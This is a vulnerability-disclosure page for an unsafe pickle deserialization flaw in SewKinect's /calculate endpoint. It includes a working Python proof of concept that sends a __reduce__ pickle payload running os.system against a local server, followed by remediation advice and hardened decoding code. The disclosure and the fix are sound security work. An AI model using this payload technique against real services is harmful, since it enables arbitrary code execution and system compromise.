Submit #653270: SewKinect latest OS Command Injection Info

Title: SewKinect latest OS Command Injection
Description:

# Remote Code Execution Vulnerability in /calculate Endpoint

### Summary

The `/calculate` endpoint in the application is vulnerable to Remote Code Execution (RCE) due to unsafe deserialization using Python's `pickle.loads` on user-supplied data.

### Details

- The endpoint accepts POST requests with form fields `body_parts` and `point_cloud`.
- These fields are base64-encoded pickled objects, which are decoded and deserialized using `pickle.loads` without validation.
- Python's `pickle` module is inherently unsafe for deserializing untrusted data, as it can execute arbitrary code during the loading process.
- An attacker can craft a malicious pickle payload to execute arbitrary system commands on the server.

## PoC

- Run the server:

```shell
python app.py
```

- Run poc.py:

```python
import pickle
import base64
import requests


class Payload(object):
    # pickle calls the returned callable with the given arguments during loading
    def __reduce__(self):
        import os
        return (os.system, ('echo "PWNED"',))


def poc():
    payload = pickle.dumps(Payload())
    resp = requests.post(
        "http://127.0.0.1:5000/calculate",
        headers={"Content-type": "application/x-www-form-urlencoded"},
        data={
            "body_parts": base64.b64encode(payload).decode(),
            "point_cloud": base64.b64encode(pickle.dumps(None)).decode()
        }
    )
    print(resp.status_code, resp.text)


if __name__ == "__main__":
    poc()
```

### Impact

Successful exploitation allows attackers to execute arbitrary code on the server, potentially leading to full system compromise, data theft, or service disruption.

### Recommendation

- Never use `pickle.loads` on data from untrusted sources.
- Replace pickle with a safe serialization format such as JSON.
- Validate and sanitize all user inputs.

### References

- [Python pickle documentation (Security Considerations)](https://docs.python.org/3/library/pickle.html#security-concerns)
- [OWASP: Deserialization of Untrusted Data](https://owasp.org/www-community/vulnerabilities/Deserialization_of_untrusted_data)
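As an added example (not code from the SewKinect project or from this report), the following contrasts the pattern the Details section describes with the fix the Recommendation asks for: the `point_cloud` field is carried as JSON and checked for shape and size, and, for code paths where pickle cannot be removed immediately, a restricted unpickler refuses to resolve any global name, so a `__reduce__`-style stream fails before any callable is invoked. The field name comes from the report; the size caps, the JSON layout and the sample inputs are assumptions constructed here.

```python
import base64
import binascii
import io
import json
import pickle

MAX_FIELD_BYTES = 1_000_000   # assumed cap on a decoded form field
MAX_POINTS = 100_000          # assumed cap on point_cloud length

def decode_field_unsafe(field: str):
    """The pattern the report describes: base64 -> pickle.loads on user data.
    pickle resolves and calls whatever the stream names; kept only for contrast."""
    return pickle.loads(base64.b64decode(field))

class _NoGlobalsUnpickler(pickle.Unpickler):
    """Stop-gap where pickle cannot be removed yet: every global lookup is refused,
    so plain lists/dicts/numbers/None load but reduce-style payloads never run."""
    def find_class(self, module, name):
        raise pickle.UnpicklingError(f"global {module}.{name} is not allowed")

def restricted_pickle_loads(raw: bytes):
    return _NoGlobalsUnpickler(io.BytesIO(raw)).load()

def decode_point_cloud(field: str) -> list[tuple[float, float, float]]:
    """Hardened replacement: the field carries JSON, a list of [x, y, z]
    numeric triples, checked for shape and size before use."""
    try:
        raw = base64.b64decode(field, validate=True)
    except (binascii.Error, ValueError) as exc:
        raise ValueError("point_cloud is not valid base64") from exc
    if len(raw) > MAX_FIELD_BYTES:
        raise ValueError("point_cloud too large")
    data = json.loads(raw)          # JSON yields only plain data, never objects or code
    if not isinstance(data, list) or len(data) > MAX_POINTS:
        raise ValueError("point_cloud must be a list of at most MAX_POINTS points")
    cloud = []
    for p in data:
        if not (isinstance(p, list) and len(p) == 3
                and all(type(v) in (int, float) for v in p)):
            raise ValueError("each point must be [x, y, z] numbers")
        cloud.append((float(p[0]), float(p[1]), float(p[2])))
    return cloud

# Constructed sample inputs, as a client would submit them in the form fields
SAMPLE_POINT_CLOUD = base64.b64encode(json.dumps([[0, 0.5, 1], [1, 2, 3]]).encode()).decode()
SAMPLE_PLAIN_PICKLE = pickle.dumps([1.0, 2.0])  # data only, no global references
SAMPLE_GLOBAL_PICKLE = pickle.dumps(len)        # names builtins.len: loader must resolve a global
```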
Source: https://github.com/giantspatula/SewKinect/issues/3
User: zznQ (UID 64000)
Submission: 2025-09-12 07:19 (8 months ago)
Moderation: 2025-09-25 16:10 (13 days later)
Status: Accepted
VulDB Entry: 325845 [giantspatula SewKinect up to 7fd963ceb3385af3706af02b8a128a13399dffb1 Endpoint /calculate pickle.loads body_parts/point_cloud privilege escalation]
Points: 20
